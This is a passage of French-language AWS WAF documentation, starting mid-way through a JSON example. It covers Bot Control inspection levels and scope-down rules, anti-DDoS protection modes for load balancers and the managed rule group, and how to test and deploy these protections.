    "ManagedRuleGroupStatement": {
      "VendorName": "AWS",
      "Name": "AWSManagedRulesBotControlRuleSet",
      "ManagedRuleGroupConfigs": [
        {
          "AWSManagedRulesBotControlRuleSet": {
            "InspectionLevel": "COMMON"
          }
        }
      ],
      "RuleActionOverrides": [],
      "ExcludedRules": []
    },
    "VisibilityConfig": {
      "SampledRequestsEnabled": true,
      "CloudWatchMetricsEnabled": true,
      "MetricName": "AWS-AWSBotControl-Example"
    },
    "ScopeDownStatement": {
      "NotStatement": {
        "Statement": {
          "ByteMatchStatement": {
            "SearchString": "YSBzZWNyZXQ=",
            "FieldToMatch": {
              "SingleHeader": {
                "Name": "x-bypass-secret"
              }
            },
            "TextTransformations": [
              {
                "Priority": 0,
                "Type": "NONE"
              }
            ],
            "PositionalConstraint": "EXACTLY"
          }
        }
      }
    }
  }
}
```

# Exemple de contrôle des bots : activation d'un niveau d'inspection ciblé
<a name="waf-bot-control-example-targeted-inspection-level"></a>

Pour un niveau de protection amélioré, vous pouvez activer le niveau d'inspection ciblé dans votre groupe de règles géré par AWS WAF Bot Control.

Dans l'exemple suivant, les fonctionnalités d'apprentissage automatique sont activées. Vous pouvez désactiver ce comportement en réglant `EnableMachineLearning` sur`false`.

```
{
  "Name": "AWS-AWSBotControl-Example",
  "Priority": 5,
  "Statement": {
    "ManagedRuleGroupStatement": {
      "VendorName": "AWS",
      "Name": "AWSManagedRulesBotControlRuleSet",
      "ManagedRuleGroupConfigs": [
        {
          "AWSManagedRulesBotControlRuleSet": {
            "InspectionLevel": "TARGETED",
            "EnableMachineLearning": true
          }
        }
      ],
      "RuleActionOverrides": [],
      "ExcludedRules": []
    },
    "VisibilityConfig": {
      "SampledRequestsEnabled": true,
      "CloudWatchMetricsEnabled": true,
      "MetricName": "AWS-AWSBotControl-Example"
    }
  }
}
```

# Exemple de contrôle des robots : utilisation de deux instructions pour limiter l'utilisation du niveau d'inspection ciblé
<a name="waf-bot-control-example-common-and-targeted-inspection-level"></a>

Pour optimiser les coûts, vous pouvez utiliser deux instructions de groupes de règles gérés par AWS WAF Bot Control dans votre pack de protection (ACL Web), avec des niveaux d'inspection et un périmètre d'inspection distincts. Par exemple, vous pouvez étendre l'énoncé du niveau d'inspection ciblé uniquement aux points de terminaison d'application les plus sensibles.

Les deux instructions de l'exemple suivant ont une portée mutuellement exclusive. Sans cette configuration, une demande pourrait donner lieu à deux évaluations de Bot Control facturées.

**Note**  
Le référencement d'instructions multiples `AWSManagedRulesBotControlRuleSet` n'est pas pris en charge dans l'éditeur visuel de la console. Utilisez plutôt l'éditeur JSON.

```
{
  "Name": "Bot-WebACL",
  "Id": "...",
  "ARN": "...",
  "DefaultAction": {
    "Allow": {}
  },
  "Description": "Bot-WebACL",
  "Rules": [
      {
        ...
      },
      {
       "Name": "AWS-AWSBotControl-Common",
       "Priority": 5,
       "Statement": {
          "ManagedRuleGroupStatement": {
             "VendorName": "AWS",
             "Name": "AWSManagedRulesBotControlRuleSet",
             "ManagedRuleGroupConfigs": [
               {
                 "AWSManagedRulesBotControlRuleSet": {
                   "InspectionLevel": "COMMON"
                 }
               }
             ],
             "RuleActionOverrides": [],
             "ExcludedRules": []
          },
          "VisibilityConfig": {
             "SampledRequestsEnabled": true,
             "CloudWatchMetricsEnabled": true,
             "MetricName": "AWS-AWSBotControl-Common"
           },
           "ScopeDownStatement": {
              "NotStatement": {
                "Statement": {
                  "ByteMatchStatement": {
                    "FieldToMatch": {
                      "UriPath": {}
                    },
                    "PositionalConstraint": "STARTS_WITH",
                    "SearchString": "/sensitive-endpoint",
                    "TextTransformations": [
                      {
                        "Type": "NONE",
                        "Priority": 0
                      }
                    ]
                  }
                }
              }
            }
        }
      },
      {
       "Name": "AWS-AWSBotControl-Targeted",
       "Priority": 6,
       "Statement": {
          "ManagedRuleGroupStatement": {
             "VendorName": "AWS",
             "Name": "AWSManagedRulesBotControlRuleSet",
             "ManagedRuleGroupConfigs": [
               {
                 "AWSManagedRulesBotControlRuleSet": {
                   "InspectionLevel": "TARGETED",
                   "EnableMachineLearning": true
                 }
               }
             ],
             "RuleActionOverrides": [],
             "ExcludedRules": []
          },
          "VisibilityConfig": {
             "SampledRequestsEnabled": true,
             "CloudWatchMetricsEnabled": true,
             "MetricName": "AWS-AWSBotControl-Targeted"
           },
           "ScopeDownStatement": {
              "Statement": {
                "ByteMatchStatement": {
                  "FieldToMatch": {
                    "UriPath": {}
                  },
                  "PositionalConstraint": "STARTS_WITH",
                  "SearchString": "/sensitive-endpoint",
                  "TextTransformations": [
                    {
                      "Type": "NONE",
                      "Priority": 0
                    }
                  ]
                }
              }
            }
        }
      }
    ],
    "VisibilityConfig": {
      ...
    },
    "Capacity": 1496,
    "ManagedByFirewallManager": false,
    "RetrofittedByFirewallManager": false
}
```

# AWS WAF Prévention du déni de service distribué (DDoS)
<a name="waf-anti-ddos"></a>

AWS WAF offre une protection sophistiquée et personnalisable contre les attaques DDo S visant vos AWS ressources. Passez en revue les options décrites dans cette section et sélectionnez le niveau de protection DDo anti-S qui répond à vos besoins commerciaux et de sécurité.

Vous pouvez choisir entre deux niveaux de protection DDo S dans AWS WAF :

Protection S au niveau des ressources DDo  
Le niveau standard fonctionne au sein des équilibreurs de charge d'application pour se défendre contre les sources malveillantes connues grâce à un filtrage sur l'hôte. Vous pouvez configurer le comportement de protection afin de réagir au mieux aux événements DDo S potentiels.  
Protection au niveau des ressources DDo S :  
+ Surveille automatiquement vos modèles de trafic.
+ Met à jour les informations sur les menaces en temps réel.
+ Protège contre les sources malveillantes connues.
**Pour optimiser les coûts des demandes ACL Web pour votre Application Load Balancer**  
Vous devez associer une ACL Web à votre Application Load Balancer pour activer la protection au niveau des ressources. Si votre Application Load Balancer est associé à une ACL Web qui n'a aucune configuration, les demandes ne vous seront pas facturées, mais vous ne fournirez pas d'échantillons de AWS WAF demandes ni ne AWS WAF publierez de rapports sur l'Application Load Balancer sous forme de métriques. CloudWatch Vous pouvez effectuer les actions suivantes pour activer les fonctionnalités d'observabilité pour l'Application Load Balancer :  
+ Utilisez l'`Block`action ou l'`Allow`action avec des en-têtes de demande personnalisés dans le`DefaultAction`. Pour plus d'informations, consultez [Insertion d'en-têtes de demande personnalisés pour les actions non bloquantes](customizing-the-incoming-request.md).
+ Ajoutez des règles à l'ACL Web. Pour plus d'informations, consultez [AWS WAF règles](waf-rules.md).
+ Activez une destination de journalisation. Pour plus d'informations, consultez [Configuration de la journalisation pour un pack de protection (ACL Web)](logging-management-configure.md).
+ Associez l'ACL Web à une AWS Firewall Manager politique. Pour plus d'informations, consultez [Création d'une AWS Firewall Manager politique pour AWS WAF](create-policy.md#creating-firewall-manager-policy-for-waf).
AWS WAF ne fournira pas d'échantillons de demandes ni ne publiera de CloudWatch métriques sans ces configurations.

AWS protection du groupe de règles géré DDo S  
Le niveau avancé de protection DDo S est proposé par le biais du`AWSManagedRulesAntiDDoSRuleSet`. Le groupe de règles gérées complète le niveau de protection au niveau des ressources, avec les différences notables suivantes :  
+ La protection s'étend à la fois aux équilibreurs de charge des applications et aux distributions CloudFront 
+ Des bases de trafic sont créées pour vos ressources protégées afin d'améliorer la détection des nouveaux modèles d'attaque.
+ Le comportement protecteur est activé en fonction des niveaux de sensibilité que vous sélectionnez.
+ Gère et étiquette les demandes adressées aux ressources protégées lors d'événements DDo S probables.
Pour une liste complète des règles et fonctionnalités incluses, voir[AWS WAF Groupe de règles de prévention du déni de service distribué (DDoS)](aws-managed-rule-groups-anti-ddos.md).

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

**Topics**
+ [Protection DDo S au niveau des ressources pour les équilibreurs de charge des applications](waf-anti-ddos-alb.md)
+ [Protection DDo anti-S avancée à l'aide du groupe de règles géré AWS WAF DDo anti-S](waf-anti-ddos-advanced.md)

# Protection DDo S au niveau des ressources pour les équilibreurs de charge des applications
<a name="waf-anti-ddos-alb"></a>

**La protection de niveau DDo S des ressources** ajoute une défense immédiate aux équilibreurs de charge des applications sans encourir de frais liés au déploiement de groupes de règles AWS WAF gérés. Ce niveau standard de protection DDo anti-S utilise les informations sur les AWS menaces et l'analyse des modèles de trafic pour protéger les équilibreurs de charge des applications. Pour identifier les sources malveillantes connues, la protection DDo anti-S effectue un filtrage sur l'hôte à la fois des adresses IP des clients directs et des en-têtes X-Forwarded-For (XFF). Une fois qu'une source malveillante connue est identifiée, la protection est activée via l'un des deux modes suivants :

**Active sous DDo S** est le mode de protection par défaut et est recommandé dans la plupart des cas d'utilisation. 

Ce mode :
+ Active automatiquement la protection lors de la détection de conditions de charge élevée ou d'événements DDo S potentiels
+ Limite le trafic provenant de sources malveillantes connues uniquement en cas d'attaque
+ Minimise l'impact sur le trafic légitime pendant les opérations normales
+ Utilise les indicateurs de santé et les données de AWS WAF réponse de l'Application Load Balancer pour déterminer quand activer la protection

**Always on** est un mode optionnel qui est toujours actif une fois activé.

Ce mode : 
+ Maintient une protection continue contre les sources malveillantes connues
+ Limite le trafic provenant de sources malveillantes connues en temps réel
+ Applique une protection aux connexions directes et aux demandes contenant des informations malveillantes IPs dans les en-têtes XFF
+ Peut avoir un impact plus important sur le trafic légitime mais offre une sécurité maximale

Les demandes bloquées par la protection DDo S au niveau des ressources sont enregistrées dans les CloudWatch journaux sous forme de métriques `LowReputationPacketsDropped` ou `LowReputationRequestsDenied` de métriques. Pour plus d'informations, consultez [AWS WAF mesures et dimensions de base](waf-metrics.md#waf-metrics-general).

## Activer la protection DDo S standard sur un WebACL existant
<a name="enabling-protection-alb"></a>

Vous pouvez activer la protection DDo S lorsque vous créez une ACL Web ou que vous mettez à jour une ACL Web existante associée à Application Load Balancer.

**Note**  
Si vous disposez d'une ACL Web existante associée à un Application Load Balancer, la protection DDo anti-S est activée par défaut avec **Active en mode DDo S.**

**Pour activer la protection DDo anti-S dans la AWS WAF console**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Choisissez **Web ACLs** dans le volet de navigation, puis ouvrez n'importe quelle ACL Web associée à un Application Load Balancer.

1. Choisissez ** AWS Ressources associées**.

1. Sous **Protection de niveau DDo de ressource S**, choisissez **Modifier**.

1. Sélectionnez l'un des modes de protection suivants :
   + **Active sous DDo S** (recommandé) - La protection ne s'active que dans des conditions de charge élevée
   + **Toujours** actif : protection permanente contre les sources malveillantes connues

1. Sélectionnez **Enregistrer les modifications**.

**Note**  
Pour plus d'informations sur la création d'une ACL Web, consultez[Création d'un pack de protection (ACL Web) dans AWS WAF](web-acl-creating.md).

**Pour optimiser les coûts des demandes ACL Web pour votre Application Load Balancer**  
Vous devez associer une ACL Web à votre Application Load Balancer pour activer la protection au niveau des ressources. Si votre Application Load Balancer est associé à une ACL Web qui n'a aucune configuration, les demandes ne vous seront pas facturées, mais vous ne fournirez pas d'échantillons de AWS WAF demandes ni ne AWS WAF publierez de rapports sur l'Application Load Balancer sous forme de métriques. CloudWatch Vous pouvez effectuer les actions suivantes pour activer les fonctionnalités d'observabilité pour l'Application Load Balancer :  
Utilisez l'`Block`action ou l'`Allow`action avec des en-têtes de demande personnalisés dans le`DefaultAction`. Pour plus d'informations, consultez [Insertion d'en-têtes de demande personnalisés pour les actions non bloquantes](customizing-the-incoming-request.md).
Ajoutez des règles à l'ACL Web. Pour plus d'informations, consultez [AWS WAF règles](waf-rules.md).
Activez une destination de journalisation. Pour plus d'informations, consultez [Configuration de la journalisation pour un pack de protection (ACL Web)](logging-management-configure.md).
Associez l'ACL Web à une AWS Firewall Manager politique. Pour plus d'informations, consultez [Création d'une AWS Firewall Manager politique pour AWS WAF](create-policy.md#creating-firewall-manager-policy-for-waf).
AWS WAF ne fournira pas d'échantillons de demandes ni ne publiera de CloudWatch métriques sans ces configurations.

# Protection DDo anti-S avancée à l'aide du groupe de règles géré AWS WAF DDo anti-S
<a name="waf-anti-ddos-advanced"></a>

Le groupe de règles `AWSManagedRulesAntiDDoSRuleSet` gérées est le niveau de protection DDo anti-S le plus avancé disponible dans AWS WAF.

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

## AWS WAF Composants de protection DDo anti-S
<a name="waf-anti-ddos-components"></a>

Les principaux composants permettant de mettre en œuvre DDo une protection anti-S avancée AWS WAF sont les suivants :

**`AWSManagedRulesAntiDDoSRuleSet`**— Détecte, étiquette et conteste les demandes susceptibles de participer à une attaque DDo S. Il étiquette également toutes les demandes adressées à une ressource protégée lors d'un événement. Pour plus de détails sur les règles et les libellés du groupe de règles, consultez[AWS WAF Groupe de règles de prévention du déni de service distribué (DDoS)](aws-managed-rule-groups-anti-ddos.md). Pour utiliser ce groupe de règles, incluez-le dans votre pack de protection (ACL Web) à l'aide d'une déclaration de référence de groupe de règles géré. Pour plus d'informations, consultez [Ajout du groupe de règles gérées DDo anti-S à votre pack de protection (ACL Web)](waf-anti-ddos-rg-using.md).
+ **Tableaux de bord de présentation du trafic Web ACL** : permettent de surveiller l'activité DDo S et les réponses DDo anti-S dans la console. Pour de plus amples informations, veuillez consulter [Tableaux de bord d'aperçu du trafic pour les packs de protection (Web ACLs)](web-acl-dashboards.md).
+ **Journalisation et statistiques** : vous permettent de surveiller le trafic et de comprendre les effets de la protection DDo anti-S. Configurez les journaux, la collecte de données Amazon Security Lake et CloudWatch les métriques Amazon pour votre pack de protection (ACL Web). Pour plus d'informations sur ces options[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md), consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md), et [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) .
+ **Libellés et règles de correspondance** des libellés : vous permettent de personnaliser le traitement des requêtes Web identifiées par le groupe de règles gérées DDo Anti-S. Pour n'importe quelle règle`AWSManagedRulesAntiDDoSRuleSet`, vous pouvez passer en mode comptage et faire correspondre les étiquettes ajoutées. Pour plus d’informations, consultez [Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md) et [Étiquetage des requêtes Web dans AWS WAF](waf-labels.md).
+ **Demandes et réponses personnalisées** : vous permettent d'ajouter des en-têtes personnalisés aux demandes autorisées et d'envoyer des réponses personnalisées pour les demandes bloquées. Associez la correspondance d'étiquettes à des fonctionnalités de demande et de réponse AWS WAF personnalisées. Pour de plus amples informations, veuillez consulter [Demandes et réponses Web personnalisées dans AWS WAF](waf-custom-request-response.md).

# Ajout du groupe de règles gérées DDo anti-S à votre pack de protection (ACL Web)
<a name="waf-anti-ddos-rg-using"></a>

Cette section explique comment ajouter et configurer le groupe de `AWSManagedRulesAntiDDoSRuleSet` règles.

Pour configurer le groupe de règles géré DDo anti-S, vous fournissez des paramètres qui incluent le degré de sensibilité du groupe de règles aux attaques DDo S et les actions qu'il entreprend sur les demandes qui participent ou sont susceptibles de participer aux attaques. Cette configuration s'ajoute à la configuration normale d'un groupe de règles géré. 

Pour la description du groupe de règles et la liste des règles et des libellés, voir[AWS WAF Groupe de règles de prévention du déni de service distribué (DDoS)](aws-managed-rule-groups-anti-ddos.md).

Ce guide est destiné aux utilisateurs qui savent généralement comment créer et gérer des packs de AWS WAF protection (Web ACLs), des règles et des groupes de règles. Ces sujets sont abordés dans les sections précédentes de ce guide. Pour obtenir des informations de base sur l'ajout d'un groupe de règles géré à votre pack de protection (ACL Web), consultez[Ajout d'un groupe de règles géré à un pack de protection (ACL Web) via la console](waf-using-managed-rule-group.md).

**Suivez les meilleures pratiques**  
Utilisez le groupe de règles Anti- DDo S conformément aux meilleures pratiques de[Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-best-practices.md). 

**Pour utiliser le groupe de `AWSManagedRulesAntiDDoSRuleSet` règles dans votre pack de protection (ACL Web)**

1. Ajoutez le groupe de règles AWS géré `AWSManagedRulesAntiDDoSRuleSet` à votre pack de protection (ACL Web) et **modifiez** les paramètres du groupe de règles avant de l'enregistrer. 
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

1. Dans le volet de **configuration du groupe de règles**, indiquez toute configuration personnalisée pour le groupe de `AWSManagedRulesAntiDDoSRuleSet` règles. 

   1. Pour le **niveau de sensibilité du bloc**, spécifiez le degré de sensibilité que vous souhaitez attribuer `DDoSRequests` à la règle lors de la correspondance sur l'étiquette de suspicion DDo S du groupe de règles. Plus la sensibilité est élevée, plus les niveaux d'étiquetage auxquels la règle correspond sont faibles : 
      + Une faible sensibilité est moins sensible, de sorte que la règle ne s'applique qu'aux participants les plus évidents à une attaque, qui ont le plus de soupçons`awswaf:managed:aws:anti-ddos:high-suspicion-ddos-request`.
      + Une sensibilité moyenne fait correspondre la règle sur les étiquettes de suspicion moyenne et élevée.
      + Une sensibilité élevée fait en sorte que la règle correspond à toutes les étiquettes suspectes : faible, moyenne et élevée.

      Cette règle fournit le traitement le plus sévère des requêtes Web soupçonnées de participer à des attaques DDo S. 

   1. Pour **Enable challenge**, choisissez si vous souhaitez activer les règles `ChallengeDDoSRequests` et`ChallengeAllDuringEvent`, par défaut, lesquelles appliquent l'Challengeaction aux demandes correspondantes. 

      Ces règles fournissent un traitement des demandes destiné à permettre aux utilisateurs légitimes de traiter leurs demandes tout en bloquant les participants à l'attaque DDo S. Vous pouvez remplacer leurs paramètres d'action Allow Count ou désactiver complètement leur utilisation.

      Si vous activez ces règles, fournissez la configuration supplémentaire que vous souhaitez : 
      + Pour le **niveau de sensibilité du défi**, spécifiez le niveau de sensibilité que vous souhaitez attribuer `ChallengeDDoSRequests` à la règle. 

        Plus la sensibilité est élevée, plus les niveaux d'étiquetage auxquels la règle correspond sont faibles : 
        + Une faible sensibilité est moins sensible, de sorte que la règle ne s'applique qu'aux participants les plus évidents à une attaque, qui ont le plus de soupçons`awswaf:managed:aws:anti-ddos:high-suspicion-ddos-request`.
        + Une sensibilité moyenne fait correspondre la règle sur les étiquettes de suspicion moyenne et élevée.
        + Une sensibilité élevée fait en sorte que la règle correspond à toutes les étiquettes suspectes : faible, moyenne et élevée.
      + Pour les **expressions régulières d'URI exemptées**, fournissez une expression régulière qui correspond URIs aux requêtes Web qui ne peuvent pas gérer un problème de navigation silencieuse. L'Challengeaction bloquera efficacement les demandes URIs dont le jeton de défi est absent, à moins qu'elles ne puissent gérer le défi du navigateur silencieux. 

        L'Challengeaction ne peut être gérée correctement que par un client qui attend du contenu HTML. Pour plus d'informations sur le fonctionnement de l'action, consultez[CAPTCHAet comportement Challenge d'action](waf-captcha-and-challenge-actions.md). 

        Vérifiez l'expression régulière par défaut et mettez-la à jour si nécessaire. Les règles utilisent l'expression régulière spécifiée pour identifier les demandes URIs qui ne peuvent pas gérer l'Challengeaction et empêcher les règles de renvoyer un défi. Les demandes que vous excluez de cette manière ne peuvent être bloquées que par le groupe de règles associé à la règle`DDoSRequests`. 

        L'expression par défaut fournie dans la console couvre la plupart des cas d'utilisation, mais vous devez la revoir et l'adapter à votre application. 

        AWS WAF prend en charge la syntaxe des modèles utilisée par la bibliothèque PCRE, `libpcre` à quelques exceptions près. La bibliothèque est documentée sur [PCRE - Perl Compatible Regular Expressions](http://www.pcre.org/). Pour plus d'informations sur AWS WAF le support, consultez[Syntaxe d'expression régulière prise en charge dans AWS WAF](waf-regex-pattern-support.md).

1. Fournissez toute configuration supplémentaire que vous souhaitez pour le groupe de règles et enregistrez la règle. 
**Note**  
AWS recommande de ne pas utiliser d'instruction scope-down avec ce groupe de règles géré. L'instruction scope-down limite les demandes observées par le groupe de règles, ce qui peut entraîner une base de trafic inexacte et une diminution de la détection des événements DDo S. L'option d'instruction scope-down est disponible pour toutes les instructions du groupe de règles géré, mais ne doit pas être utilisée pour celle-ci. Pour plus d'informations sur les instructions de portée réduite, voir. [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md)

1. Sur la page **Définir la priorité des règles**, déplacez la nouvelle règle de groupe de règles géré DDo anti-S vers le haut afin qu'elle ne s'exécute qu'après toutes les règles Allow d'action que vous avez et avant toute autre règle. Cela permet au groupe de règles de suivre le plus de trafic à des fins de protection DDo anti-S. 

1. Enregistrez les modifications apportées au pack de protection (ACL Web). 

Avant de déployer votre implémentation DDo anti-S pour le trafic de production, testez-la et ajustez-la dans un environnement intermédiaire ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite les règles en mode comptage avec votre trafic de production avant de les activer. Consultez la section qui suit pour obtenir des conseils. 

# Tester et déployer Anti- DDo S
<a name="waf-anti-ddos-deploying"></a>

Vous devez configurer et tester la prévention du déni de service (DDoS) AWS WAF distribué avant de déployer la fonctionnalité. Cette section fournit des conseils généraux pour la configuration et les tests, mais les étapes spécifiques que vous choisissez de suivre dépendront de vos besoins, des ressources et des demandes Web que vous recevrez. 

Ces informations s'ajoutent aux informations générales sur les tests et le réglage fournies sur[Tester et ajuster vos AWS WAF protections](web-acl-testing.md).

**Note**  
AWS Les règles gérées sont conçues pour vous protéger contre les menaces Web les plus courantes. Lorsqu'ils sont utilisés conformément à la documentation, les groupes de règles AWS gérées ajoutent un niveau de sécurité supplémentaire à vos applications. Cependant, les groupes de règles AWS gérées ne sont pas destinés à remplacer vos responsabilités en matière de sécurité, qui sont déterminées par les AWS ressources que vous sélectionnez. Reportez-vous au [modèle de responsabilité partagée](https://aws.amazon.com/compliance/shared-responsibility-model/) pour vous assurer que vos ressources AWS sont correctement protégées. 

**Risque lié au trafic de production**  
Testez et ajustez votre implémentation DDo anti-S dans un environnement de test ou de test jusqu'à ce que vous soyez à l'aise avec l'impact potentiel sur votre trafic. Testez et ajustez ensuite les règles en mode comptage avec votre trafic de production avant de les activer. 

Ce guide est destiné aux utilisateurs qui savent généralement comment créer et gérer des packs de AWS WAF protection (Web ACLs), des règles et des groupes de règles. Ces sujets sont abordés dans les sections précédentes de ce guide. 

**Pour configurer et tester une mise en œuvre de la prévention du déni de service (DDoS) AWS WAF distribué**

Effectuez ces étapes d'abord dans un environnement de test, puis en production.

1. 

**Ajouter le groupe de règles gérées de prévention du déni de service (DDoS) AWS WAF distribué en mode décompte**
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

   Ajoutez le groupe de règles AWS gérées `AWSManagedRulesAntiDDoSRuleSet` à un pack de protection (ACL Web) nouveau ou existant et configurez-le de manière à ce qu'il ne modifie pas le comportement actuel du pack de protection (ACL Web). Pour plus de détails sur les règles et les libellés de ce groupe de règles, consultez[AWS WAF Groupe de règles de prévention du déni de service distribué (DDoS)](aws-managed-rule-groups-anti-ddos.md).
   + Lorsque vous ajoutez le groupe de règles géré, modifiez-le et procédez comme suit : 
     + Dans le volet de **configuration du groupe de règles**, fournissez les informations nécessaires pour effectuer des activités DDo anti-S pour votre trafic Web. Pour de plus amples informations, veuillez consulter [Ajout du groupe de règles gérées DDo anti-S à votre pack de protection (ACL Web)](waf-anti-ddos-rg-using.md).
     + Dans le volet **Règles**, ouvrez le menu déroulant **Remplacer toutes les actions des règles** et choisissez. **Count** Avec cette configuration, AWS WAF évalue les demandes par rapport à toutes les règles du groupe de règles et ne compte que les correspondances qui en résultent, tout en ajoutant des étiquettes aux demandes. Pour de plus amples informations, veuillez consulter [Remplacer les actions des règles dans un groupe de règles](web-acl-rule-group-settings.md#web-acl-rule-group-rule-action-override).

       Grâce à cette dérogation, vous pouvez surveiller l'impact potentiel des règles gérées DDo anti-S afin de déterminer si vous souhaitez apporter des modifications, telles que l'extension de l'expression régulière pour les personnes URIs qui ne peuvent pas gérer un problème de navigateur silencieux. 
   + Positionnez le groupe de règles de manière à ce qu'il soit évalué le plus tôt possible, immédiatement après les règles autorisant le trafic. Les règles sont évaluées par ordre de priorité numérique croissant. La console définit l'ordre pour vous, en commençant par le haut de votre liste de règles. Pour de plus amples informations, veuillez consulter [Définition de la priorité des règles](web-acl-processing-order.md). 

1. 

**Activer la journalisation et les métriques pour le pack de protection (ACL Web)**

   Le cas échéant, configurez la journalisation, la collecte de données Amazon Security Lake, l'échantillonnage des demandes et CloudWatch les métriques Amazon pour le pack de protection (ACL Web). Vous pouvez utiliser ces outils de visibilité pour surveiller l'interaction du groupe de règles gérées DDo anti-S avec votre trafic. 
   + Pour plus d'informations sur la configuration et l'utilisation de la journalisation, consultez[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 
   + Pour plus d'informations sur Amazon Security Lake, consultez [Qu'est-ce qu'Amazon Security Lake ?](https://docs.aws.amazon.com/security-lake/latest/userguide/what-is-security-lake.html) et [Collecte de données à partir AWS des services](https://docs.aws.amazon.com/security-lake/latest/userguide/internal-sources.html) décrits dans le *guide de l'utilisateur d'Amazon Security Lake*. 
   + Pour plus d'informations sur CloudWatch les métriques Amazon, consultez[Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md). 
   + Pour plus d'informations sur l'échantillonnage des requêtes Web, consultez[Affichage d'un exemple de demandes web](web-acl-testing-view-sample.md). 

1. 

**Associer le pack de protection (ACL Web) à une ressource**

   Si le pack de protection (ACL Web) n'est pas déjà associé à une ressource de test, associez-le. Pour plus d'informations, consultez [Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md).

1. 

**Surveillez le trafic et les correspondances DDo aux règles anti-S**

   Assurez-vous que votre trafic normal circule et que les règles des groupes de règles gérés Anti- DDo S ajoutent des étiquettes aux requêtes Web correspondantes. Vous pouvez voir les étiquettes dans les journaux, ainsi que les statistiques DDo anti-S et relatives aux étiquettes dans les CloudWatch statistiques Amazon. Dans les journaux, les règles que vous avez remplacées pour être prises en compte dans le groupe de règles apparaissent dans le `ruleGroupList` champ « `action` set to count » et `overriddenAction` indiquent l'action de règle configurée que vous avez remplacée. 

1. 

**Personnaliser la gestion des requêtes Web Anti- DDo S**

   Le cas échéant, ajoutez vos propres règles qui autorisent ou bloquent explicitement les demandes, afin de modifier la façon dont les règles DDo anti-S les traiteraient autrement. 

   Par exemple, vous pouvez utiliser des étiquettes DDo anti-S pour autoriser ou bloquer les demandes ou pour personnaliser le traitement des demandes. Vous pouvez ajouter une règle de correspondance d'étiquettes après le groupe de règles géré DDo anti-S afin de filtrer les demandes étiquetées pour le traitement que vous souhaitez appliquer. Après le test, maintenez les règles DDo anti-S associées en mode décompte et conservez les décisions relatives au traitement des demandes dans votre règle personnalisée. 

1. 

**Supprimer les règles de test et configurer les paramètres Anti- DDo S**

   Passez en revue les résultats de vos tests pour déterminer les règles DDo anti-S que vous souhaitez conserver en mode comptage à des fins de surveillance uniquement. Pour toutes les règles que vous souhaitez exécuter avec une protection active, désactivez le mode de comptage dans la configuration du groupe de règles du pack de protection (ACL Web) pour leur permettre d'exécuter les actions configurées. Une fois que vous avez finalisé ces paramètres, supprimez toutes les règles de correspondance temporaires des étiquettes de test tout en conservant les règles personnalisées que vous avez créées pour une utilisation en production. Pour d'autres considérations relatives à la configuration DDo anti-S, voir[Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-best-practices.md).

1. 

**Surveiller et régler**

   Pour vous assurer que les requêtes Web sont traitées comme vous le souhaitez, surveillez attentivement votre trafic après avoir activé la fonctionnalité DDo anti-S que vous souhaitez utiliser. Ajustez le comportement selon vos besoins en annulant le nombre de règles sur le groupe de règles et en appliquant vos propres règles. 

# Meilleures pratiques en matière d'DDoanti-S
<a name="waf-anti-ddos-best-practices"></a>
+ **Activez la protection pendant les périodes de trafic normales** : cela permet à la protection d'établir des modèles de trafic de base avant de répondre aux attaques. Ajoutez une protection lorsque vous n'êtes pas victime d'une attaque et prévoyez du temps pour l'établissement de base.
+ **Surveillez régulièrement les indicateurs** : passez en revue CloudWatch les indicateurs pour comprendre les modèles de trafic et l'efficacité de la protection.
+ **Envisagez le mode proactif pour les applications critiques** — Bien que le mode réactif soit recommandé dans la plupart des cas d'utilisation, envisagez d'utiliser le mode proactif pour les applications nécessitant une protection continue contre les menaces connues.
+ **Tester dans des environnements intermédiaires** : avant d'activer la protection en production, testez et ajustez les paramètres dans un environnement intermédiaire afin de comprendre l'impact sur le trafic légitime.

# Intégrations d'applications clientes dans AWS WAF
<a name="waf-application-integration"></a>

Cette section explique comment utiliser l'intégration intelligente des menaces APIs et l'API d'intégration JavaScript CAPTCHA avec vos AWS WAF fonctionnalités. 

Utilisez l'intégration des applications clientes APIs pour associer les protections côté AWS WAF client aux protections de votre pack de protection AWS côté serveur (Web ACL), afin de vérifier que les applications clientes qui envoient des requêtes Web à vos ressources protégées sont bien les clients visés et que vos utilisateurs finaux sont des êtres humains. 

Utilisez les intégrations du client pour gérer les problèmes liés aux navigateurs silencieux et les puzzles CAPTCHA, obtenir des jetons prouvant que le navigateur et l'utilisateur final ont répondu avec succès, et pour inclure ces jetons dans les demandes adressées à vos terminaux protégés. Pour des informations générales sur AWS WAF les jetons, consultez[Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md). 

